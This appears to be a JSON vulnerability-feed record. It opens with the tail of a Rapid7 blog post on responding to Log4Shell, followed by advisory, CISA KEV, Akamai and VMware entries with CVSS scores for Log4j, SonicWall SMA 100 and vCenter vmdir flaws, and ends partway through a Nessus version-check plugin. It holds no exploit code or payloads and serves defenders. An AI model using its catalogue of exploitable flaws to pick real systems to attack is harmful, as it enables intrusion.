This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolutely necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. Here are those resources for quick, easy reference.\n\n * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)\n * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)\n * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)\n * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)\n * [ShadowServer](<https://www.shadowserver.org/>)\n * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)\n\n_**Additional reading:**_\n\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T18:00:00", "type": "rapid7blog", "title": "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T18:00:00", "id": "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "href": "https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-09T15:44:21", "description": "A command injection vulnerability exists in SonicWall SMA 100. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "checkpoint_advisories", "title": "SonicWall SMA 100 Command Injection (CVE-2021-20039)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039"], "modified": "2022-06-09T00:00:00", "id": "CPAI-2021-1187", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:19", "description": "A buffer overflow vulnerability exists in SonicWall SMA100. Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-06T00:00:00", "type": "checkpoint_advisories", "title": "SonicWall SMA100 Buffer Overflow (CVE-2021-20038)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-02-06T00:00:00", "id": "CPAI-2021-1065", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:19", "description": "An authentication bypass vulnerability exists in VMware VCenter Server Directory Service. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-26T00:00:00", "type": "checkpoint_advisories", "title": "VMware VCenter Server Directory Service Authentication Bypass (CVE-2020-3952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-10-26T00:00:00", "id": "CPAI-2020-1024", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "SonicWall SMA 100 devies are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2021-20038", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Info Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3952", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-05-26T00:56:18", "description": "3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\nUnder certain conditions[1] vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 10.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-16T00:00:00", "id": "VMSA-2020-0006.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.1.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T22:42:33", "description": "##### 1\\. Impacted Products\n\n * VMware vCenter Server\n\n##### 2\\. Introduction\n\n###### A sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) was privately reported to VMware. vCenter updates are available to address this vulnerability. \n\n\n###### \n\n##### 3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\n\n**Description: \n**\n\nUnder certain conditions1 vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [10.0](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors:**\n\nA malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication. \n\n\n**Resolution:**\n\nTo remediate CVE-2020-3952 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds:**\n\nNone.\n\n**Additional Documentation:**\n\nVMware has created [KB78543](<https://kb.vmware.com/s/article/78543>) which details steps to determine whether or not a particular deployment is affected by CVE-2020-3952. \n\n\n**Acknowledgements:**\n\nNone.\n\n**Notes:**\n\n1vCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected.\n\n**Response Matrix:**\n", "cvss3": {}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-09T00:00:00", "id": "VMSA-2020-0006", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T14:07:01", "description": "##### **1\\. Impacted Products (Under Evaluation)**\n\n * VMware Horizon \n\n * VMware vCenter Server\n * VMware HCX \n\n * VMware NSX-T Data Center\n * VMware Unified Access Gateway\n * VMware WorkspaceOne Access\n * VMware Identity Manager \n * VMware vRealize Operations\n * VMware vRealize Operations Cloud Proxy\n * VMware vRealize Automation \n\n * VMware vRealize Lifecycle Manager\n * VMware Site Recovery Manager, vSphere Replication \n\n * VMware Carbon Black Cloud Workload Appliance\n * VMware Carbon Black EDR Server\n * VMware Tanzu GemFire \n\n * VMware Tanzu Greenplum\n * VMware Tanzu Operations Manager\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Kubernetes Grid Integrated Edition\n * VMware Tanzu Observability by Wavefront Nozzle\n * Healthwatch for Tanzu Application Service \n\n * Spring Cloud Services for VMware Tanzu\n * Spring Cloud Gateway for VMware Tanzu\n * Spring Cloud Gateway for Kubernetes\n * API Portal for VMware Tanzu\n * Single Sign-On for VMware Tanzu Application Service\n * App Metrics\n * VMware vCenter Cloud Gateway\n * VMware vRealize Orchestrator \n\n * VMware Cloud Foundation\n * VMware Workspace ONE Access Connector\n * VMware Horizon DaaS\n * VMware Horizon Cloud Connector \n\n * VMware NSX Data Center for vSphere\n * VMware AppDefense Appliance\n * VMware Cloud Director Object Storage Extension\n * VMware Telco Cloud Operations \n\n * VMware vRealize Log Insight\n * VMware Tanzu Scheduler\n * VMware Smart Assurance NCM\n * VMware Smart Assurance SAM [Service Assurance Manager] \n\n * VMware Integrated OpenStack\n * VMware vRealize Business for Cloud\n * (Additional products will be added) \n\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware products. \n\nThis is an ongoing event, please check this advisory for frequent updates as they develop. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nRemote code execution vulnerability via Apache Log4j.\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2021-44228 to this issue.\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system. \n\n\n**Resolution**\n\nFixes for CVE-2021-44228 are documented in the 'Fixed Version' column of the 'Response Matrix' below. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-44228 are documented in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nNone.\n\n**Acknowledgements**\n\nNone. \n\n\n**Notes**\n\n * Exploitation attempts in the wild have been confirmed by VMware.\n * A supplemental blog post & frequently asked questions list was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0028-faq>\n * Unaffected VMware products can be referred to on the Knowledge Base article: <https://kb.vmware.com/s/article/87068>\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "vmware", "title": "VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T00:00:00", "id": "VMSA-2021-0028.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0028.1.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "", "cvss3": {}, "published": "2020-04-15T18:47:00", "type": "akamaiblog", "title": "What?s a 10? Pwning vCenter with CVE-2020-3952", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-15T18:47:00", "id": "AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2", "href": "https://www.akamai.com/blog/security/pwning-vmware-vcenter-cve-2020-3952", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-18T00:39:45", "description": "Continuing with our research into CVE-2021-44228, Akamai has previously written about what the vulnerability is and given recommendations on how to go beyond patching for extra protection. Across the Akamai network, we see traffic from 1.3 billion unique devices daily, with record traffic of 182 Tbps. The threat research team has been investigating this traffic to gain deeper insights into how this vulnerability is being exploited. We want to share more technical findings and what they mean for threat hunters. Here are some implications for defenders and threat hunters to consider", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:30:00", "type": "akamaiblog", "title": "Threat Intelligence on Log4j CVE: Key Findings and Their Implications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T19:30:00", "id": "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "href": "https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T00:37:20", "description": "Log4Shell (CVE-2021-44228) is a remote code execution (RCE) vulnerability in the Apache-foundation open-source logging library Log4j. It was published on December 9, 2021, and then all hell broke loose. As Log4j is a common logging library for Java applications, it is highly widespread.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:30:00", "type": "akamaiblog", "title": "Our Journey to Detect Log4j-Vulnerable Machines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T19:30:00", "id": "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "href": "https://www.akamai.com/blog/security/our-journey-to-detect-log4j-vulnerable-machines", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:37:08", "description": "A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that?s used widely in applications, including many by large enterprise organizations. The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There are already reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T10:30:00", "type": "akamaiblog", "title": "Akamai Recommendations for Log4j Mitigation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T10:30:00", "id": "AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "href": "https://www.akamai.com/blog/security/akamai-recommendations-for-log4j-mitigation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T15:31:47", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to U3F, and is, therefore, affected by an information disclosure vulnerability caused by insufficient access controls in vmdir. This allows an attacker with network access to an affected vmdir deployment may be able to extract highly sensitive information. This information can be used to compromise the vCenter Server or other services which depends on VMware directory service authentication. (CVE-2020-3952) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-13T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2020-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/135411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135411);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-3952\");\n script_xref(name:\"VMSA\", value:\"2020-0006\");\n script_xref(name:\"IAVA\", value:\"2020-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by a\nsensitive information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior\nto U3F, and is, therefore, affected by an information disclosure vulnerability caused by\ninsufficient access controls in vmdir. This allows an attacker with network access to an \naffected vmdir deployment may be able to extract highly sensitive information. This information\ncan be used to compromise the vCenter Server or other services which depends on VMware directory \nservice authentication. (CVE-2020-3952)\n \nNote that Nessus has not tested for these issues but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3F or later.\");\n 